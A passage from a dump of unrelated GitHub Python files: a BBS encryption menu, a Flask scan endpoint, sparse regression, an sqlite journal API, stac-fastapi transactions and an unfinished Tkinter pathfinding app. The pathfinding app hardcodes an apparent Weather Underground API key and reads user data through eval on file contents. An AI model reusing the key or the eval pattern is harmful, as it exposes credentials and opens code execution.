\\| | | | | '_ ` _ \\ / __| '_ \\| | | | '_ \\ \n | |_) | | |_| | | | | | | | |_) | | |_| | | | | | | \\__ \\ | | | |_| | |_) |\n |____/|_|\\__,_|_| |_| |_| |_.__/|_|\\__,_|_| |_| |_| |___/_| |_|\\__,_|_.__/ \n \n in Python \n \"\"\")\n\ntitle()\n\t\nwhile True:\n\t\n\tprint(\"=== Main Menu ===\")\n\tprint('1. Make keys\\n2. Encrypt\\n3. Decrypt')\n\tchoice = input('What would you like to do?: ')\n\tprint('')\n\tif choice == '1': # make keys\n\t\tkey()\n\t\tprint('')\n\t\tcontinue\n\telif choice == '2': # encryption\n\t\tencrypt()\n\t\tprint('')\n\t\tcontinue\n\telif choice == '3': # decryption\n\t\tdecrypt()\n\t\tprint('')\n\t\tcontinue\n\telse:\n\t\tprint('Invalid choice! Enter 1, 2, or 3.')\n\t\tprint('')\n\t\tcontinue\n","repo_name":"Sonvanelle/BBS-Py","sub_path":"BBS(itsdoneandshit).py","file_name":"BBS(itsdoneandshit).py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7196327034","text":"from flask import Blueprint, request, jsonify\nfrom utils.auth_utils import authenticated\nfrom utils.socketio_utils import send_message_to_client\nfrom db.qr_location_repository import QrLocationRepository\nfrom db.user_exercise_repository import UserExerciseRepository\nimport processing.action_recognition\nimport concurrent.futures\nimport threading\nimport logging\n\nscan_bp = Blueprint('scan', __name__)\nqr_location_repository = QrLocationRepository()\nuser_exercise_repository = UserExerciseRepository()\nexecutor = concurrent.futures.ThreadPoolExecutor()\n\nbackground_tasks = {}\ncancel_flags = {}\n\n\ndef on_scan_task_complete(future, user_id, qr_id):\n logging.info(f'on_scan_task_complete user_id: {user_id}, qr_id: {qr_id}')\n task = background_tasks.get(qr_id)\n if task:\n del background_tasks[qr_id]\n try:\n result = future.result()\n logging.info(f'result: {result}')\n if result == 'ok':\n ue = user_exercise_repository.find_all_by_user_id(user_id, 1)[0]\n send_message_to_client(user_id, 'scan_finish', ue)\n else:\n send_message_to_client(user_id, 'scan_finish_err')\n except Exception as e:\n logging.exception(e)\n send_message_to_client(user_id, 'scan_finish_err')\n\n\n\n@scan_bp.route('/', methods=['GET'])\n@authenticated\ndef scan(qr_id):\n try:\n user_id = int(request.user['user_id'])\n qr_location = qr_location_repository.find_by_qr_id(qr_id)\n cancel_flag = threading.Event()\n task = executor.submit(processing.action_recognition.run_action_form_recognition, user_id, qr_location, cancel_flag)\n task.add_done_callback(lambda future: on_scan_task_complete(future.result(), user_id, qr_id))\n background_tasks[qr_id] = task\n cancel_flags[qr_id] = cancel_flag\n\n return jsonify({'message': 'Escaneo iniciado'}), 200\n except Exception as e:\n logging.exception(e)\n return jsonify({'message': 'Error inesperado', 'error': str(e)}), 500\n\n\n@scan_bp.route('/cancel/', methods=['GET'])\n@authenticated\ndef cancel(qr_id):\n try:\n task = background_tasks.get(qr_id)\n if task:\n cancel_flag = cancel_flags.get(qr_id)\n if cancel_flag:\n cancel_flag.set()\n del background_tasks[qr_id]\n return jsonify({'message': f'Escaneo del QR {qr_id} cancelado'}), 200\n else:\n return jsonify({'message': f'El escaneo del QR {qr_id} no se pudo cancelar'}), 500\n else:\n return jsonify({'message': f'QR {qr_id} no está en proceso'}), 404\n except Exception as e:\n logging.exception(e)\n return jsonify({'message': 'Error inesperado', 'error': str(e)}), 500\n","repo_name":"alexiscomerci/tr_back","sub_path":"blueprints/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3022079098","text":"import numpy as np\n\ndef sparsify(theta, dX, _lambda, dimensions):\n \"\"\"sparse solution for dX/dt = theta(X) * Xi\n\n @param theta : each col is polynomially expanded function of row data\n @param dX : approximate derivative of time-series data\n\n returns xi : sparse approximation for dynamics underlying time series data\n \"\"\"\n\n xi, _, _, _ = np.linalg.lstsq(theta, dX)\n \n for i in range(10):\n xi = _regularize(xi, _lambda)\n xi = _iterateRegression(xi, theta, dX, _lambda, dimensions)\n return xi\n\ndef _regularize(xi, _lambda):\n \"clips small elements (to zero)\"\n\n smallIdx = abs(xi)<=_lambda\n xi[smallIdx] = 0\n return xi\n\ndef _iterateRegression(xi, theta, dX, _lambda, dimensions):\n \"performs least-squares iteration on a subset of indices above lambda threshold\"\n\n if dimensions == 1:\n bigIdx = abs(xi[:]) > _lambda\n tempXi, _, _, _ = np.linalg.lstsq(theta[:, bigIdx], dX)\n xi[bigIdx] = tempXi\n \n else:\n for dim in range(dimensions):\n # bigIdx = [i for i,v in enumerate(xi[:, dim]) if abs(v) > _lambda]\n bigIdx = abs(xi[:, dim]) > _lambda\n tempXi, _, _, _ = np.linalg.lstsq(theta[:, bigIdx], dX[:, dim])\n xi[bigIdx, dim] = tempXi\n \n return xi","repo_name":"max-hoffman/dimspan-py","sub_path":"dimspan/sindy/sparsify.py","file_name":"sparsify.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"15500190260","text":"import sqlite3\nfrom models import Entry\nfrom models import Mood\n\ndef get_all_entries():\n \"\"\"Gets all entries\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n db_cursor.execute(\"\"\"\n SELECT\n e.id,\n e.concept,\n e.date,\n e.mood_id,\n e.entry,\n m.label\n FROM Entry e\n JOIN Mood m\n ON m.id = e.mood_id\n \"\"\")\n\n entries = []\n dataset = db_cursor.fetchall()\n\n for row in dataset:\n entry = Entry(row['id'], row['concept'], row['date'], row['mood_id'],\n row['entry'])\n \n mood = Mood(row['id'], row['label'])\n entry.mood = mood.__dict__\n\n entries.append(entry.__dict__)\n\n return entries\n\ndef get_single_entry(id):\n \"\"\"Gets single entry by id\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n db_cursor.execute(\"\"\"\n SELECT\n e.id,\n e.concept,\n e.date,\n e.mood_id,\n e.entry\n FROM 'Entry' e\n WHERE e.id = ?\n \"\"\", ( id, ))\n\n data = db_cursor.fetchone()\n\n entry = Entry(data['id'], data['concept'], data['date'], data['mood_id'],\n data['entry'])\n\n return entry.__dict__\n\ndef get_entries_by_search(searched_term):\n \"\"\"Gets entires by searched term\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n SELECT\n e.id,\n e.concept,\n e.date,\n e.mood_id,\n e.entry\n from Entry e\n WHERE e.concept LIKE ?\n \"\"\", (f'%{searched_term}%',))\n\n\n entries = []\n dataset = db_cursor.fetchall()\n\n for row in dataset:\n entry = Entry(row['id'], row['concept'], row['date'], row['mood_id'] , row['entry'])\n entries.append(entry.__dict__)\n\n return entries\n\ndef delete_entry(id):\n \"\"\"Deletes single entry by id\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n DELETE FROM 'Entry'\n WHERE id = ?\n \"\"\", (id, ))\n\ndef create_journal_entries(new_entry):\n \"\"\"Creates a new entry\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n INSERT INTO Entry\n ( concept, date, mood_id, entry )\n VALUES\n ( ?, ?, ?, ? );\n \"\"\", (new_entry['concept'], new_entry['date'],\n new_entry['mood_id'], new_entry['entry'], ))\n\n id = db_cursor.lastrowid\n new_entry['id'] = id\n\n\n return new_entry","repo_name":"erniefabian3rd/daily-journal-server","sub_path":"views/entry_requests.py","file_name":"entry_requests.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42388757755","text":"from dataclasses import dataclass\nfrom typing import Optional, Any, TypeVar\n\n\nT = TypeVar(\"T\")\n\n\ndef from_str(x: Any) -> str:\n assert isinstance(x, str)\n return x\n\n\ndef from_int(x: Any) -> int:\n assert isinstance(x, int) and not isinstance(x, bool)\n return x\n\n\ndef from_none(x: Any) -> Any:\n assert x is None\n return x\n\n\ndef from_union(fs, x):\n for f in fs:\n try:\n return f(x)\n except:\n pass\n assert False\n\n\ndef from_float(x: Any) -> float:\n assert isinstance(x, (float, int)) and not isinstance(x, bool)\n return float(x)\n\n\ndef to_float(x: Any) -> float:\n assert isinstance(x, float)\n return x\n\n\n@dataclass\nclass Doc:\n journal_id: str\n rank: int\n normalized_name: str\n display_name: str\n webpage: Optional[str]\n paper_count: int\n citation_count: int\n created_date: str\n version: float\n issn: Optional[str]\n\n @staticmethod\n def from_dict(obj: Any) -> 'Doc':\n assert isinstance(obj, dict)\n journal_id = from_str(obj.get(\"JournalId\"))\n rank = from_int(obj.get(\"Rank\"))\n normalized_name = from_str(obj.get(\"NormalizedName\"))\n display_name = from_str(obj.get(\"DisplayName\"))\n webpage = from_union([from_str, from_none], obj.get(\"Webpage\"))\n paper_count = from_int(obj.get(\"PaperCount\"))\n citation_count = from_int(obj.get(\"CitationCount\"))\n created_date = from_str(obj.get(\"CreatedDate\"))\n version = from_float(obj.get(\"_version_\"))\n issn = from_union([from_str, from_none], obj.get(\"Issn\"))\n return Doc(journal_id, rank, normalized_name, display_name, webpage, paper_count, citation_count, created_date, version, issn)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"JournalId\"] = from_str(self.journal_id)\n result[\"Rank\"] = from_int(self.rank)\n result[\"NormalizedName\"] = from_str(self.normalized_name)\n result[\"DisplayName\"] = from_str(self.display_name)\n result[\"Webpage\"] = from_union([from_str, from_none], self.webpage)\n result[\"PaperCount\"] = from_int(self.paper_count)\n result[\"CitationCount\"] = from_int(self.citation_count)\n result[\"CreatedDate\"] = from_str(self.created_date)\n result[\"_version_\"] = to_float(self.version)\n result[\"Issn\"] = from_union([from_str, from_none], self.issn)\n return result\n\n","repo_name":"sonne-academic/solr-utils","sub_path":"data/mag/data_classes/journal_mag.py","file_name":"journal_mag.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70214761126","text":"from PIL import Image\nfrom pathlib import Path\n\n\nclass ScaleZip:\n\n def __init__(self, filename, size):\n self.filename = filename\n self.size = size\n self.temp_directory = Path(\"unzipped-{}\".format(filename[:-4]))\n\n def process_files(self):\n '''Scale each image in the directory to given size'''\n for filename in self.temp_directory.iterdir():\n if str(filename)[-3:] == 'jpg':\n im = Image.open(str(filename))\n scaled = im.resize(self.size)\n scaled.save(str(filename))\n","repo_name":"H4wking/lab7","sub_path":"task3/scale_zip.py","file_name":"scale_zip.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41945693061","text":"\"\"\"transactions extension client.\"\"\"\n\nimport logging\nimport asyncio\nimport json\nfrom datetime import datetime\nimport redis\nfrom redis.commands.json.path import Path\n\n\nimport attr\nfrom stac_pydantic.shared import DATETIME_RFC339\n\nfrom stac_fastapi.nodb.config import Tile38Settings\nfrom stac_fastapi.nodb.serializers import CollectionSerializer, ItemSerializer\nfrom stac_fastapi.nodb.session import Session\nfrom stac_fastapi.extensions.third_party.bulk_transactions import (\n BaseBulkTransactionsClient,\n Items,\n)\nfrom stac_fastapi.types import stac as stac_types\nfrom stac_fastapi.types.core import BaseTransactionsClient\nfrom stac_fastapi.types.errors import ConflictError, ForeignKeyError, NotFoundError\nfrom stac_fastapi.types.links import CollectionLinks\n\nlogger = logging.getLogger(__name__)\n\nCOLLECTIONS = []\n\n@attr.s\nclass TransactionsClient(BaseTransactionsClient):\n \"\"\"Transactions extension specific CRUD operations.\"\"\"\n\n session: Session = attr.ib(default=attr.Factory(Session.create_from_env))\n settings = Tile38Settings()\n tile38_client = settings.create_tile_38_client\n redis_client = settings.create_redis_client\n\n def create_item(self, model: stac_types.Item, **kwargs):\n \"\"\"Create item.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n\n ##### implement after bulk sync post request\n # # If a feature collection is posted\n # if model[\"type\"] == \"FeatureCollection\":\n # bulk_client = BulkTransactionsClient()\n # processed_items = [\n # bulk_client._preprocess_item(item, base_url)\n # for item in model[\"features\"]\n # ]\n # return_msg = f\"Successfully added {len(processed_items)} items.\"\n # bulk_client.bulk_sync(processed_items)\n\n # return return_msg\n\n # If a single item is posted\n self.check_collection_not_exists(model)\n\n if self.redis_client.json().get(model[\"id\"]):\n raise ConflictError(\n f\"Item {model['id']} in collection {model['collection']} already exists\"\n )\n\n data = ItemSerializer.stac_to_db(model, base_url)\n\n self.redis_client.json().set(model[\"id\"], Path.rootPath(), data)\n\n ### run async code for tile38 client\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n coroutine = self.create_geojson_object(data)\n loop.run_until_complete(coroutine)\n\n return ItemSerializer.db_to_stac(data, base_url)\n\n # async example for tile38 client\n async def create_geojson_object(self, item: stac_types.Item):\n ### tile 38 def function\n # loop = asyncio.new_event_loop()\n # asyncio.set_event_loop(loop)\n # coroutine = self.jset_collection(model)\n # response = loop.run_until_complete(coroutine)\n # return str(response)\n\n await self.tile38_client.set(\"items\", item[\"id\"]).object(item[\"geometry\"]).exec()\n # response = await self.tile38_client.get(\"items\", item[\"id\"]).asObject()\n\n # return response.object\n\n def create_collection(self, model: stac_types.Collection, **kwargs):\n \"\"\"Create collection.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n collection_links = CollectionLinks(\n collection_id=model[\"id\"], base_url=base_url\n ).create_links()\n model[\"links\"] = collection_links\n\n if self.redis_client.json().get(model[\"id\"]):\n raise ConflictError(f\"Collection {model['id']} already exists\")\n\n self.redis_client.json().set(model[\"id\"], Path.rootPath(), model)\n self.redis_client.sadd(\"collections\", model[\"id\"])\n\n collection = self.redis_client.json().get(model[\"id\"])\n return CollectionSerializer.db_to_stac(collection, base_url)\n\n def check_collection_not_exists(self, model):\n if not self.redis_client.json().get(model[\"collection\"]):\n raise ForeignKeyError(f\"Collection {model['collection']} does not exist\")\n\n def check_collection_not_found(self, collection_id):\n if not self.redis_client.json().get(collection_id):\n raise NotFoundError(f\"Collection {collection_id} not found\")\n\n def check_item_not_exists(self, item_id, collection_id):\n if not self.redis_client.json().get(item_id):\n raise NotFoundError(\n f\"Item {item_id} in collection {collection_id} doesn't exist\"\n )\n\n def update_item(self, item: stac_types.Item, **kwargs):\n \"\"\"Update item.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n now = datetime.utcnow().strftime(DATETIME_RFC339)\n item[\"properties\"][\"updated\"] = str(now)\n self.check_collection_not_exists(item)\n self.check_item_not_exists(item[\"id\"], item[\"collection\"])\n self.delete_item(item[\"id\"], item[\"collection\"])\n self.create_item(item, **kwargs)\n\n return ItemSerializer.db_to_stac(item, base_url)\n\n def update_collection(self, model: stac_types.Collection, **kwargs):\n \"\"\"Update collection.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n self.check_collection_not_found(model[\"id\"])\n self.delete_collection(model[\"id\"])\n self.create_collection(model, **kwargs)\n\n return CollectionSerializer.db_to_stac(model, base_url)\n\n def delete_item(self, item_id: str, collection_id: str, **kwargs):\n \"\"\"Delete item.\"\"\"\n self.check_item_not_exists(item_id, collection_id)\n self.redis_client.json().delete(item_id, Path.rootPath())\n\n def delete_collection(self, collection_id: str, **kwargs):\n \"\"\"Delete collection.\"\"\"\n self.check_collection_not_found(collection_id)\n self.redis_client.json().delete(collection_id, Path.rootPath())\n self.redis_client.srem(\"collections\", collection_id)\n\n\n# @attr.s\n# class BulkTransactionsClient(BaseBulkTransactionsClient):\n# \"\"\"Postgres bulk transactions.\"\"\"\n\n# session: Session = attr.ib(default=attr.Factory(Session.create_from_env))\n\n# def __attrs_post_init__(self):\n# \"\"\"Create es engine.\"\"\"\n# settings = ElasticsearchSettings()\n# self.client = settings.create_client\n\n# def _preprocess_item(self, model: stac_types.Item, base_url) -> stac_types.Item:\n# \"\"\"Preprocess items to match data model.\"\"\"\n# if not self.client.exists(index=\"stac_collections\", id=model[\"collection\"]):\n# raise ForeignKeyError(f\"Collection {model['collection']} does not exist\")\n\n# if self.client.exists(index=\"stac_items\", id=model[\"id\"]):\n# raise ConflictError(\n# f\"Item {model['id']} in collection {model['collection']} already exists\"\n# )\n\n# item = ItemSerializer.stac_to_db(model, base_url)\n# return item\n\n# def bulk_sync(self, processed_items):\n# \"\"\"Elasticsearch bulk insertion.\"\"\"\n# actions = [\n# {\"_index\": \"stac_items\", \"_source\": item} for item in processed_items\n# ]\n# helpers.bulk(self.client, actions)\n\n# def bulk_item_insert(self, items: Items, **kwargs) -> str:\n# \"\"\"Bulk item insertion using es.\"\"\"\n# transactions_client = TransactionsClient()\n# transactions_client._create_item_index()\n# try:\n# base_url = str(kwargs[\"request\"].base_url)\n# except Exception:\n# base_url = \"\"\n# processed_items = [\n# self._preprocess_item(item, base_url) for item in items.items.values()\n# ]\n# return_msg = f\"Successfully added {len(processed_items)} items.\"\n\n# self.bulk_sync(processed_items)\n\n# return return_msg\n","repo_name":"jonhealy1/stac-fastapi-nodb","sub_path":"stac_fastapi/nodb/stac_fastapi/nodb/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38013122878","text":"#Chris Wallace\n#Pythoneas\n\n#T I M E L O G\n#04/09/17: 2.0 hr\n#04/14/17: 0.5 hr\n#04/15/17: 5.0 hr\n#04/16/17: 2.0 hr\n#04/17/17: 2.5 hr\n#04/20/17: 5.0 hr\n#04/21/17: 1.0 hr\n#04/23/17: 1.0 hr\n#04/24/17: 2.0 hr\n#04/25/17: 3.0 hr\n#04/26/17: 3.0 hr\n#04/27/16: 4.0 hr\n#04/28/17: 3.0 hr\n#04/29/17: 5.0 hr\n#04/30/17: 4.0 hr\n#05/01/17: 4.0 hr\n#05/02/17: 2.0 hr\n#05/03/17: 3.0 hr\n\n#TOTAL: 52.0 hr\n\n################################################################################\n#BACK END\n################################################################################\nimport math\nimport random\n#Used for Weather Underground API\nimport urllib.request\nimport json\n\n#Use for user data and file reading\n#File IO code taken from strings section of course wedbapge\n#https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\nwith open(\"users.txt\", \"rt\") as f:\n userDict = eval(f.read())\n\n#Used for weather underground API\napikey = \"4636dc7c5e68a48a\"\nstate = None\ncity = None\napistuff = (0, 0, 0)\n#Code taken from Weather Underground API Code Samples page (python section)\n#https://www.wunderground.com/weather/api/d/docs?d=resources/code-samples&MR=1\n#With help using Python documentation for urllib.request and json modules\n#https://docs.python.org/3/library/urllib.request.html\n#https://docs.python.org/2/library/json.html\ndef useAPIOnce():\n if((city != None) and (state != None)):\n url = 'http://api.wunderground.com/api/%s/' % apikey\n url += 'geolookup/conditions/q/%s/%s.json' % (state, city)\n f = urllib.request.urlopen(url)\n json_string = f.read().decode(\"utf-8\")\n parsed_json = json.loads(json_string)\n location = parsed_json['location']['city']\n temp = float(parsed_json['current_observation']['feelslike_f'])\n wind = float(parsed_json['current_observation']['wind_mph'])\n precip = float(parsed_json['current_observation']['precip_today_metric'])\n rainsnow = None\n if(precip > 0):\n if(temp < 32):\n rainsnow = \"snow\"\n else:\n rainsnow = \"rain\"\n apistuff = (temp, wind, rainsnow)\n f.close()\n\ndef distance(x1, y1, x2, y2):\n #Find Cartesian Distance\n return math.sqrt((x2-x1)**2 + (y2-y1)**2)\n\ndef testMap():\n #Test Graph for Dijksta's Algorithm\n a = Node(50, 100, \"a\")\n b = Node(250, 500, \"b\")\n c = Node(650, 400, \"c\")\n d = Node(300, 150, \"d\")\n e = Node(400, 50, \"e\")\n a.addAdj(b)\n a.addAdj(d)\n a.addAdj(e)\n c.addAdj(b)\n c.addAdj(d)\n c.addAdj(e)\n e.addAdj(d)\n d.addAdj(b)\n tmap = Map()\n tmap.nodes.add(a)\n tmap.nodes.add(a)\n tmap.nodes.add(b)\n tmap.nodes.add(c)\n tmap.nodes.add(d)\n tmap.nodes.add(e)\n print(tmap)\n return tmap\n\n#MAP\nclass Map(object):\n def __init__(self):\n #Keep track of essential lists/sets for Dijkstra's algorithm\n self.visited = set()\n self.nodes = set()\n self.tree = list()\n self.path = list()\n self.possNodes = set()\n\n def __str__(self):\n #Effectively print all node and edge data\n stri = \"\"\n for node in self.nodes:\n for adj in node.adjs:\n stri = stri + \"\\n%s - %s %f\" % (node.name, adj.name, \n node.adjs[adj].weight)\n stri = stri + \"\\n\"\n return stri\n\n def reset(self):\n #Refresh map (used for returning to home screen)\n self.visited = set()\n self.tree = list()\n self.path = list()\n self.nodes = set()\n print(\"TRIGGERED\")\n\n def isPossible(self, start, end, node = None):\n #Finds if path is possible\n if(node == None):\n node = start\n self.possNodes.add(start)\n if(node == end):\n return True\n else:\n for node2 in node.adjs: \n if(node2 not in self.possNodes):\n self.possNodes.add(node2)\n solve = self.isPossible(start, end, node2)\n if(solve == True):\n return solve\n return False\n\n def dijkstra(self, start, end, i = 0):\n #Dijkstra's Algorithm for mapping the shortest path\n #Initialize tentative distance of start node\n self.possNodes = set()\n if(not self.isPossible(start, end)): return \"error\"\n self.visited = set()\n self.tree = list()\n self.path = list()\n for node in self.nodes:\n node.reset()\n start.tentD = 0\n #Print check\n #print(\"START %s \\nEND %s\" % (start.name, end.name))\n #print(\"VISITED\")\n self.visited.add(start)\n for node in self.visited:\n #print(node.name)\n pass\n #Run until end not has been visited\n while end not in self.visited:\n #Reset valid nodes\n valid = set()\n for node in self.visited:\n for adj in node.adjs:\n #Make sure not already visited and adjascent to a visited\n ch = (node.adjs[adj].weights[i] != math.inf)\n if((adj not in self.visited) and (adj in node.adjs) and ch):\n valid.add(adj)\n if(node.tentD + node.adjs[adj].weights[i] < adj.tentD):\n #Update tentative distance\n #print(adj.closestTent)\n adj.closestTent = node\n adj.tentD = node.tentD + node.adjs[adj].weights[i]\n #Print Check\n #print(\"VALID\")\n for node in valid:\n #print(node.name + \" from \" + node.closestTent.name)\n pass\n #Initialize minimum distance and minimum node\n minD = None\n minN = None\n #Find minimums\n for near in valid:\n if(minD == None):\n minD = near.tentD\n minN = near\n if(near.tentD < minD):\n minD = near.tentD\n minN = near\n #Print check\n #print(\"PICK %s\" % minN.name)\n self.visited.add(minN) #Add closest node to visited\n #Print Check\n #print(\"VISITED\")\n for node in self.visited:\n #print(node.name, end = \" \")\n pass\n #print(\"\")\n #Add tuple to represent edge\n self.tree.append((minN.closestTent, minN))\n #Print Check\n count = 0\n #print(\"TREE\")\n for tup in self.tree:\n #print(count, end = \" \")\n #print(tup[0].name, tup[1].name)\n count += 1\n #Extract specific path\n return self.findPath(start, end)\n\n def findPath(self, start, end):\n #Give list of nodes in path\n final = [end] #Initialize with end and move back\n prev = end #Keep track of last node\n #End when both start and end in path\n while start not in final:\n for tup in self.tree:\n #Found node that precedes last node\n if(tup[1] == prev):\n final.insert(0, tup[0]) #Place in beginning of list\n prev = tup[0]\n self.path = final\n #Print Check\n #print(\"PATH\")\n for node in self.path:\n #print(node.name, end = \" \")\n pass\n #print(\"\")\n return self.path\n\n def findNode(self, x, y, r):\n #Determine which node was clicked based on cartesian coordinates\n for node in self.nodes:\n if((x <= node.x + r) and (x >= node.x - r) and (y <= node.y + r)\n and (y >= node.y - r)):\n return node\n\n#NODE\nclass Node(object):\n def __init__(self, x, y, n):\n #Essential node characteristics\n self.x = x\n self.y = y #Cartesian coordinates\n self.name = n\n self.adjs = dict() #Dictionary of adjascent nodes mapping to edges\n self.tentD = math.inf \n self.closestTent = None #To be implemented in Dijkstra's Algorithm\n\n def __str__(self):\n #Print Essential info of node\n return \"%s (%d,%d)\" % (self.name, self.x, self.y)\n\n def reset(self):\n #Reset values needed for Dijkstra's Algorithm\n self.tentD = math.inf\n self.closestTent = None\n\n def addAdj(self, other, od, st, prefW, prefS, c, s):\n #Add adjascent node\n d = distance(self.x, self.y, other.x, other.y)\n #Add wieghted edge to both dictioanries\n self.adjs[other] = Edge(self, other, d, od, st, prefW, prefS, c, s)\n other.adjs[self] = Edge(other, self, d, od, st, prefW, prefS, c, s)\n\n def removeAdj(self, other):\n #Remove an adjascent node from the node's dictionary\n if((other not in self.adjs) or (self not in other.adjs)):\n return \n del self.adjs[other]\n del other.adjs[self]\n\n#EDGE\nclass Edge(object):\n def __init__(self,node1,node2,distance,outdoors,stairs,prefW,prefS,c,s):\n #Specify important details about the edge\n self.node1 = node1\n self.node2 = node2\n self.outdoors = outdoors\n self.weatherweight = apistuff\n self.stairs = stairs\n self.weights = [distance]*3\n #Modify weights by data and user preference\n if(self.outdoors):\n (t, w, rs) = self.weatherweight\n weath = abs(50 - t) + w\n if(rs == \"rain\"):\n weath += 50\n elif(rs == \"snow\"):\n weath += 100\n self.weights[1] += ((prefW * weath)/self.weights[0])\n if(self.stairs):\n if(prefS == 2):\n #Add longest possible edge (Diagonal of window)\n self.weights[2] = math.inf\n else:\n self.weights[2] += prefS * 50\n\n def __str__(self):\n #Return a string representing an edge\n return \"%s - %s, %f\" % (self.node1.name, self.node2.name, \n self.weight)\n\n def getCoords(self):\n #Find coordinates of an edge for drawing purposes\n coords = []\n coords.append(self.node1.x)\n coords.append(self.node1.y)\n coords.append(self.node2.x)\n coords.append(self.node2.y)\n return coords\n\n################################################################################\n#FRONT END\n################################################################################\n\n#Run function and event based animations framework from course website\nfrom tkinter import *\nfrom tkinter import messagebox, simpledialog\n\ndef init(data):\n #Initialize data\n data.marginx = 50\n data.marginy = 50\n data.map = Map()\n #data.map = testMap()\n data.r = 5\n data.start = None\n data.end = None\n data.path = None\n data.circs = []\n data.screen = \"home\"\n data.mode = \"\"\n data.nextchar=chr(ord(\"a\")+(len(data.map.nodes))%26)\n data.firstNode = None\n data.secondNode = None\n data.undoN = []\n data.undoE = []\n data.gridSpacing = 40\n data.pathindex = 0\n data.sp = None\n data.wp = None\n data.user = None\n data.password = None\n data.userkey = None\n data.mapStr = \"\"\n data.fileName = None\n data.fsstr = \"\"\n data.ssstr = \"\"\n data.clicked = None\n data.fileSpots1 = list()\n data.fileSpots2 = list()\n data.userList = list()\n data.otherList = list()\n #Image Code taken from Misc Tkinter Demos on course webpage\n #https://www.cs.cmu.edu/~112/notes/imagesDemo1.py\n #Image from https://icons.wxug.com/logos/PNG/wundergroundLogo_4c.png\n data.image = None\n data.wuimage = PhotoImage(file = \"wu.gif\")\n data.wuimage = data.wuimage.subsample(4, 4)\n data.hlcolors = [\"green\", \"orange\", \"dodger blue\"]\n #Button Code taken from Misc Tkinter Demos on Course Webpage\n #https://www.cs.cmu.edu/~112/notes/button-demo1.py\n #https://www.cs.cmu.edu/~112/notes/button-demo2.py\n buttonFrame = Frame(data.root)\n editB = Button(buttonFrame, text = \"EDIT\", font = \"Times 32\",\n command=lambda:onButton(data,\"edit\"))\n editB.grid(row=0,column=1)\n browseB = Button(buttonFrame, text = \"BROWSE\", font = \"Times 32\",\n command=lambda:onButton(data,\"browse\"))\n browseB.grid(row=0,column=0)\n homeB = Button(data.root, text = \"HOME\", font = \"Times 32\",\n command=lambda:onButton(data,\"home\"))\n homeB.pack()\n buttonFrame.pack(side=BOTTOM)\n\ndef choose(message, title, options):\n #Taken from Misc Tkinter Demos on course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n msg = message + \"\\n\" + \"Choose one:\"\n for i in range(len(options)):\n msg += \"\\n\" + str(i+1) + \": \" + options[i]\n response = simpledialog.askstring(title, msg)\n return int(response)\n\ndef onButton(data, buttonId):\n #Button clicked, as taken from course website\n #https://www.cs.cmu.edu/~112/notes/button-demo1.py\n #https://www.cs.cmu.edu/~112/notes/button-demo2.py\n if(buttonId == \"edit\"): \n data.screen = \"edit\"\n #Taken from Misc Tkinter Demos on Course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n msgC = \"Enter City:\"\n msgSt = \"Enter State (abbreviated):\"\n titleC = \"CITY\"\n titleSt = \"STATE\"\n city = simpledialog.askstring(titleC, msgC)\n city = city.replace(\" \", \"_\")\n state = simpledialog.askstring(titleSt, msgSt)\n data.mapStr += \"city = !%s!\\nstate = !%s!\" % (city, state)\n useAPIOnce()\n msgW = \"How much do you want to walk outdoors?\"\n msgS = \"Are stairs an issue?\"\n titleW = \"WEATHER\"\n titleS = \"ACCESSIBILITY\"\n optionsW = [\"I'd like to walk outside\", \"It doesn't matter\"]\n optionsW.append(\"I'd like to walk inside\")\n optionsS = [\"I don't mind stairs\",\"I'd rather not traverse stairs\"]\n optionsS.append(\"Avoid stairs\")\n responseW = choose(msgW, titleW, optionsW)\n responseS = choose(msgS, titleS, optionsS)\n data.wp = responseW - 2\n data.sp = responseS - 1\n msgPic = \"Enter the name of your picture (include .gif)\"\n msgPic += \"\\n(type \\'grid\\' if you simply want a grid and no picture)\"\n titlePic = \"TITLE\"\n #Do not ask if editing saved map with pic\n if(data.image == None):\n data.image = simpledialog.askstring(titlePic, msgPic)\n if(data.image != \"grid\"):\n #Image Code taken from Misc Tkinter Demos on course webpage\n #https://www.cs.cmu.edu/~112/notes/imagesDemo1.py\n data.mapStr += \"\\ndata.image=PhotoImage(file = !%s!)\"%data.image\n data.image = PhotoImage(file = data.image)\n elif(buttonId == 